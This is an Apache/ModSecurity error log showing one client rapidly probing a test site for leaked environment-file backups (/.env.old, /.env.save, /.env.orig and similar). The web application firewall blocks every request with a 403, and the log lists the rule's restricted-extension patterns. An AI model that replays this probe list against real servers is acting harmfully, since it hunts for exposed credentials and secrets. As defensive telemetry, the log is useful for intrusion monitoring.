[Fri Jan 16 03:14:08.068386 2026] [:error] [pid 1444040] [client 45.148.10.246:36622] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme8Pn_5sIyKhJ5GAzXrwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak2
[Fri Jan 16 03:14:08.068619 2026] [:error] [pid 1444040] [client 45.148.10.246:36622] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme8Pn_5sIyKhJ5GAzXrwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak2
[Fri Jan 16 03:14:08.068775 2026] [:error] [pid 1444040] [client 45.148.10.246:36622] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme8Pn_5sIyKhJ5GAzXrwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak2
[Fri Jan 16 03:14:08.187564 2026] [:error] [pid 1444031] [client 45.148.10.246:36638] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8H-9MmrgwjmYTAJQbAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.old
[Fri Jan 16 03:14:08.187713 2026] [:error] [pid 1444031] [client 45.148.10.246:36638] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8H-9MmrgwjmYTAJQbAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.old
[Fri Jan 16 03:14:08.187958 2026] [:error] [pid 1444031] [client 45.148.10.246:36638] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8H-9MmrgwjmYTAJQbAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.old
[Fri Jan 16 03:14:08.188163 2026] [:error] [pid 1444031] [client 45.148.10.246:36638] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8H-9MmrgwjmYTAJQbAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.old
[Fri Jan 16 03:14:08.349586 2026] [:error] [pid 1444033] [client 45.148.10.246:36644] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old/"] [unique_id "aWme8NLJkp65ULFQ2YYglQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.old/
[Fri Jan 16 03:14:08.349807 2026] [:error] [pid 1444033] [client 45.148.10.246:36644] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old/"] [unique_id "aWme8NLJkp65ULFQ2YYglQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.old/
[Fri Jan 16 03:14:08.349964 2026] [:error] [pid 1444033] [client 45.148.10.246:36644] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old/"] [unique_id "aWme8NLJkp65ULFQ2YYglQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.old/
[Fri Jan 16 03:14:08.532468 2026] [:error] [pid 1444034] [client 45.148.10.246:36652] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8ORfEYyDES-ZFL4giQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.old
[Fri Jan 16 03:14:08.532615 2026] [:error] [pid 1444034] [client 45.148.10.246:36652] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8ORfEYyDES-ZFL4giQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.old
[Fri Jan 16 03:14:08.532835 2026] [:error] [pid 1444034] [client 45.148.10.246:36652] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8ORfEYyDES-ZFL4giQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.old
[Fri Jan 16 03:14:08.533019 2026] [:error] [pid 1444034] [client 45.148.10.246:36652] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8ORfEYyDES-ZFL4giQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.old
[Fri Jan 16 03:14:08.706497 2026] [:error] [pid 1444032] [client 45.148.10.246:36654] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8OkMvq8uPO2ZciWoiAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.old
[Fri Jan 16 03:14:08.706633 2026] [:error] [pid 1444032] [client 45.148.10.246:36654] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8OkMvq8uPO2ZciWoiAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.old
[Fri Jan 16 03:14:08.706852 2026] [:error] [pid 1444032] [client 45.148.10.246:36654] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8OkMvq8uPO2ZciWoiAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.old
[Fri Jan 16 03:14:08.707019 2026] [:error] [pid 1444032] [client 45.148.10.246:36654] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWme8OkMvq8uPO2ZciWoiAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.old
[Fri Jan 16 03:14:09.067195 2026] [:error] [pid 1444040] [client 45.148.10.246:36680] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig/"] [unique_id "aWme8fn_5sIyKhJ5GAzXsAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.orig/
[Fri Jan 16 03:14:09.067421 2026] [:error] [pid 1444040] [client 45.148.10.246:36680] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig/"] [unique_id "aWme8fn_5sIyKhJ5GAzXsAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.orig/
[Fri Jan 16 03:14:09.067577 2026] [:error] [pid 1444040] [client 45.148.10.246:36680] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig/"] [unique_id "aWme8fn_5sIyKhJ5GAzXsAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.orig/
[Fri Jan 16 03:14:09.212190 2026] [:error] [pid 1444031] [client 45.148.10.246:36684] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aWme8X-9MmrgwjmYTAJQbQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.orig
[Fri Jan 16 03:14:09.212428 2026] [:error] [pid 1444031] [client 45.148.10.246:36684] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aWme8X-9MmrgwjmYTAJQbQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.orig
[Fri Jan 16 03:14:09.212581 2026] [:error] [pid 1444031] [client 45.148.10.246:36684] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aWme8X-9MmrgwjmYTAJQbQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.orig
[Fri Jan 16 03:14:09.605703 2026] [:error] [pid 1444034] [client 45.148.10.246:46920] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8eRfEYyDES-ZFL4gigAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.save
[Fri Jan 16 03:14:09.605920 2026] [:error] [pid 1444034] [client 45.148.10.246:46920] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8eRfEYyDES-ZFL4gigAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.save
[Fri Jan 16 03:14:09.606086 2026] [:error] [pid 1444034] [client 45.148.10.246:46920] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8eRfEYyDES-ZFL4gigAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.save
[Fri Jan 16 03:14:09.726590 2026] [:error] [pid 1444032] [client 45.148.10.246:46932] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save/"] [unique_id "aWme8ekMvq8uPO2ZciWoiQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.save/
[Fri Jan 16 03:14:09.726809 2026] [:error] [pid 1444032] [client 45.148.10.246:46932] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save/"] [unique_id "aWme8ekMvq8uPO2ZciWoiQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.save/
[Fri Jan 16 03:14:09.726955 2026] [:error] [pid 1444032] [client 45.148.10.246:46932] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save/"] [unique_id "aWme8ekMvq8uPO2ZciWoiQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.save/
[Fri Jan 16 03:14:09.869692 2026] [:error] [pid 1444226] [client 45.148.10.246:46934] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8WcpoCUgeFICb0bc2QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.save
[Fri Jan 16 03:14:09.869907 2026] [:error] [pid 1444226] [client 45.148.10.246:46934] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8WcpoCUgeFICb0bc2QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.save
[Fri Jan 16 03:14:09.870085 2026] [:error] [pid 1444226] [client 45.148.10.246:46934] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8WcpoCUgeFICb0bc2QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.save
[Fri Jan 16 03:14:10.027751 2026] [:error] [pid 1444040] [client 45.148.10.246:46942] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8vn_5sIyKhJ5GAzXsQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.save
[Fri Jan 16 03:14:10.027968 2026] [:error] [pid 1444040] [client 45.148.10.246:46942] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8vn_5sIyKhJ5GAzXsQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.save
